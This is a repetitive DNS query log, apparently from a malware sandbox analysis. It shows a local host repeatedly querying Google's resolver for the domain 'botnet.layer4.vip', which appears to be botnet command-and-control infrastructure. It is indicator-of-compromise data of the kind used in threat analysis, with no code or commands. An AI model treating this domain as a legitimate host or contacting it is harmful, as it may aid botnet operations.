                                  Apr 9, 2023 03:31:02.870122910 CEST192.168.2.238.8.8.80x4bd1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.885874033 CEST192.168.2.238.8.8.80x4bd1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.910466909 CEST192.168.2.238.8.8.80x4bd1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.926312923 CEST192.168.2.238.8.8.80x14eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.950654030 CEST192.168.2.238.8.8.80x14eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.975274086 CEST192.168.2.238.8.8.80x14eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.999775887 CEST192.168.2.238.8.8.80x14eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.024171114 CEST192.168.2.238.8.8.80x14eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.048863888 CEST192.168.2.238.8.8.80xefd6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.064490080 CEST192.168.2.238.8.8.80xefd6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.080439091 CEST192.168.2.238.8.8.80xefd6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.104604959 CEST192.168.2.238.8.8.80xefd6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.128861904 CEST192.168.2.238.8.8.80xefd6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.144634008 CEST192.168.2.238.8.8.80x3b2eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.169267893 CEST192.168.2.238.8.8.80x3b2eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.184969902 CEST192.168.2.238.8.8.80x3b2eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.209252119 CEST192.168.2.238.8.8.80x3b2eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.233566999 CEST192.168.2.238.8.8.80x3b2eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.259867907 CEST192.168.2.238.8.8.80x77ceStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.275923967 CEST192.168.2.238.8.8.80x77ceStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.291724920 CEST192.168.2.238.8.8.80x77ceStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.315923929 CEST192.168.2.238.8.8.80x77ceStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.340302944 CEST192.168.2.238.8.8.80x77ceStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.364954948 CEST192.168.2.238.8.8.80x2cd7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.380567074 CEST192.168.2.238.8.8.80x2cd7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.396204948 CEST192.168.2.238.8.8.80x2cd7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.420696974 CEST192.168.2.238.8.8.80x2cd7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.436336994 CEST192.168.2.238.8.8.80x2cd7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.460623026 CEST192.168.2.238.8.8.80x9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.485213041 CEST192.168.2.238.8.8.80x9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.509649038 CEST192.168.2.238.8.8.80x9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.525567055 CEST192.168.2.238.8.8.80x9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.549943924 CEST192.168.2.238.8.8.80x9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.574659109 CEST192.168.2.238.8.8.80xbb80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.590764046 CEST192.168.2.238.8.8.80xbb80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.606573105 CEST192.168.2.238.8.8.80xbb80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.622301102 CEST192.168.2.238.8.8.80xbb80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.646485090 CEST192.168.2.238.8.8.80xbb80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.671130896 CEST192.168.2.238.8.8.80x30beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.687231064 CEST192.168.2.238.8.8.80x30beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.711927891 CEST192.168.2.238.8.8.80x30beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.727719069 CEST192.168.2.238.8.8.80x30beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.752095938 CEST192.168.2.238.8.8.80x30beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.776804924 CEST192.168.2.238.8.8.80xc2cfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.792824030 CEST192.168.2.238.8.8.80xc2cfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.808501959 CEST192.168.2.238.8.8.80xc2cfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.824470043 CEST192.168.2.238.8.8.80xc2cfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.848738909 CEST192.168.2.238.8.8.80xc2cfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.873440981 CEST192.168.2.238.8.8.80xa140Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.889261961 CEST192.168.2.238.8.8.80xa140Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.913801908 CEST192.168.2.238.8.8.80xa140Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.929480076 CEST192.168.2.238.8.8.80xa140Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.953860044 CEST192.168.2.238.8.8.80xa140Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.978534937 CEST192.168.2.238.8.8.80xe360Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.003161907 CEST192.168.2.238.8.8.80xe360Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.019021988 CEST192.168.2.238.8.8.80xe360Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.035024881 CEST192.168.2.238.8.8.80xe360Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.059309006 CEST192.168.2.238.8.8.80xe360Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.083729982 CEST192.168.2.238.8.8.80xb412Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.107959986 CEST192.168.2.238.8.8.80xb412Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.123938084 CEST192.168.2.238.8.8.80xb412Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.148209095 CEST192.168.2.238.8.8.80xb412Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.163964987 CEST192.168.2.238.8.8.80xb412Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.180526972 CEST192.168.2.238.8.8.80xd684Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.196002007 CEST192.168.2.238.8.8.80xd684Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.220357895 CEST192.168.2.238.8.8.80xd684Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.244714975 CEST192.168.2.238.8.8.80xd684Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.260529995 CEST192.168.2.238.8.8.80xd684Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.276540041 CEST192.168.2.238.8.8.80x1cc0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.300741911 CEST192.168.2.238.8.8.80x1cc0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.316281080 CEST192.168.2.238.8.8.80x1cc0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.340672016 CEST192.168.2.238.8.8.80x1cc0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.356574059 CEST192.168.2.238.8.8.80x1cc0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.380899906 CEST192.168.2.238.8.8.80x2d26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.396791935 CEST192.168.2.238.8.8.80x2d26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.412501097 CEST192.168.2.238.8.8.80x2d26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.436827898 CEST192.168.2.238.8.8.80x2d26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.452496052 CEST192.168.2.238.8.8.80x2d26Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.468413115 CEST192.168.2.238.8.8.80x12fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.484630108 CEST192.168.2.238.8.8.80x12fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.508883953 CEST192.168.2.238.8.8.80x12fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.533279896 CEST192.168.2.238.8.8.80x12fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.557521105 CEST192.168.2.238.8.8.80x12fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.573769093 CEST192.168.2.238.8.8.80xaa75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.589303017 CEST192.168.2.238.8.8.80xaa75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.605380058 CEST192.168.2.238.8.8.80xaa75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.621042967 CEST192.168.2.238.8.8.80xaa75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.645622969 CEST192.168.2.238.8.8.80xaa75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.670453072 CEST192.168.2.238.8.8.80xf7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.695014000 CEST192.168.2.238.8.8.80xf7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.719615936 CEST192.168.2.238.8.8.80xf7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.735868931 CEST192.168.2.238.8.8.80xf7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.751976967 CEST192.168.2.238.8.8.80xf7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.768253088 CEST192.168.2.238.8.8.80x65f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.786652088 CEST192.168.2.238.8.8.80x65f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.811239958 CEST192.168.2.238.8.8.80x65f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.827307940 CEST192.168.2.238.8.8.80x65f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.852057934 CEST192.168.2.238.8.8.80x65f8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.876619101 CEST192.168.2.238.8.8.80xc709Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.892396927 CEST192.168.2.238.8.8.80xc709Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.908222914 CEST192.168.2.238.8.8.80xc709Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.923893929 CEST192.168.2.238.8.8.80xc709Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.939640045 CEST192.168.2.238.8.8.80xc709Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.955599070 CEST192.168.2.238.8.8.80x40ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.971395016 CEST192.168.2.238.8.8.80x40ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:04.996191025 CEST192.168.2.238.8.8.80x40ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.012342930 CEST192.168.2.238.8.8.80x40ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.036647081 CEST192.168.2.238.8.8.80x40ecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.052969933 CEST192.168.2.238.8.8.80x3bb0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.077445984 CEST192.168.2.238.8.8.80x3bb0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.093132019 CEST192.168.2.238.8.8.80x3bb0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.117721081 CEST192.168.2.238.8.8.80x3bb0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.133867025 CEST192.168.2.238.8.8.80x3bb0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.159003973 CEST192.168.2.238.8.8.80x1e42Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.176076889 CEST192.168.2.238.8.8.80x1e42Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.191950083 CEST192.168.2.238.8.8.80x1e42Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.208451033 CEST192.168.2.238.8.8.80x1e42Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.224519014 CEST192.168.2.238.8.8.80x1e42Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.249277115 CEST192.168.2.238.8.8.80x93dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.265105963 CEST192.168.2.238.8.8.80x93dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.289916039 CEST192.168.2.238.8.8.80x93dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.314449072 CEST192.168.2.238.8.8.80x93dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.339644909 CEST192.168.2.238.8.8.80x93dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.363861084 CEST192.168.2.238.8.8.80x57c1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.388607979 CEST192.168.2.238.8.8.80x57c1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.404696941 CEST192.168.2.238.8.8.80x57c1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.428921938 CEST192.168.2.238.8.8.80x57c1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.444919109 CEST192.168.2.238.8.8.80x57c1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.469595909 CEST192.168.2.238.8.8.80xd5e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.493722916 CEST192.168.2.238.8.8.80xd5e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.509345055 CEST192.168.2.238.8.8.80xd5e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.534006119 CEST192.168.2.238.8.8.80xd5e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.558610916 CEST192.168.2.238.8.8.80xd5e2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.574348927 CEST192.168.2.238.8.8.80xd8adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.589946985 CEST192.168.2.238.8.8.80xd8adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.614221096 CEST192.168.2.238.8.8.80xd8adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.630305052 CEST192.168.2.238.8.8.80xd8adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.646117926 CEST192.168.2.238.8.8.80xd8adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.670747995 CEST192.168.2.238.8.8.80x7fecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.686772108 CEST192.168.2.238.8.8.80x7fecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.710985899 CEST192.168.2.238.8.8.80x7fecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.735544920 CEST192.168.2.238.8.8.80x7fecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.759701967 CEST192.168.2.238.8.8.80x7fecStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.775707960 CEST192.168.2.238.8.8.80x3a07Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.791491032 CEST192.168.2.238.8.8.80x3a07Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.815772057 CEST192.168.2.238.8.8.80x3a07Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.831769943 CEST192.168.2.238.8.8.80x3a07Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.847419977 CEST192.168.2.238.8.8.80x3a07Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.872214079 CEST192.168.2.238.8.8.80xecfaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.888183117 CEST192.168.2.238.8.8.80xecfaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.903847933 CEST192.168.2.238.8.8.80xecfaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.928374052 CEST192.168.2.238.8.8.80xecfaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.944047928 CEST192.168.2.238.8.8.80xecfaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.968261957 CEST192.168.2.238.8.8.80x9317Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:05.984133959 CEST192.168.2.238.8.8.80x9317Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.008239031 CEST192.168.2.238.8.8.80x9317Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.032326937 CEST192.168.2.238.8.8.80x9317Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.056485891 CEST192.168.2.238.8.8.80x9317Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.081562042 CEST192.168.2.238.8.8.80xcf40Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.106070042 CEST192.168.2.238.8.8.80xcf40Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.130342007 CEST192.168.2.238.8.8.80xcf40Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.146040916 CEST192.168.2.238.8.8.80xcf40Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.162441015 CEST192.168.2.238.8.8.80xcf40Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.178292036 CEST192.168.2.238.8.8.80x1e8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.194168091 CEST192.168.2.238.8.8.80x1e8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.219079018 CEST192.168.2.238.8.8.80x1e8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.243422031 CEST192.168.2.238.8.8.80x1e8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.268210888 CEST192.168.2.238.8.8.80x1e8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.284241915 CEST192.168.2.238.8.8.80xf02dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.300164938 CEST192.168.2.238.8.8.80xf02dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.315859079 CEST192.168.2.238.8.8.80xf02dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.340173960 CEST192.168.2.238.8.8.80xf02dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.364779949 CEST192.168.2.238.8.8.80xf02dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.389070034 CEST192.168.2.238.8.8.80xbdf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.413644075 CEST192.168.2.238.8.8.80xbdf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.429569960 CEST192.168.2.238.8.8.80xbdf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.453861952 CEST192.168.2.238.8.8.80xbdf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.469760895 CEST192.168.2.238.8.8.80xbdf4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.494852066 CEST192.168.2.238.8.8.80x3217Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.519597054 CEST192.168.2.238.8.8.80x3217Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.544425964 CEST192.168.2.238.8.8.80x3217Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.568545103 CEST192.168.2.238.8.8.80x3217Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.593100071 CEST192.168.2.238.8.8.80x3217Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.609210968 CEST192.168.2.238.8.8.80xc1fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.633513927 CEST192.168.2.238.8.8.80xc1fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.658940077 CEST192.168.2.238.8.8.80xc1fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.674926996 CEST192.168.2.238.8.8.80xc1fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.691092968 CEST192.168.2.238.8.8.80xc1fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.715496063 CEST192.168.2.238.8.8.80x949Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.740555048 CEST192.168.2.238.8.8.80x949Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.765374899 CEST192.168.2.238.8.8.80x949Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.790265083 CEST192.168.2.238.8.8.80x949Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.814599991 CEST192.168.2.238.8.8.80x949Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.839488029 CEST192.168.2.238.8.8.80x1660Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.855570078 CEST192.168.2.238.8.8.80x1660Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.883083105 CEST192.168.2.238.8.8.80x1660Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.907316923 CEST192.168.2.238.8.8.80x1660Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
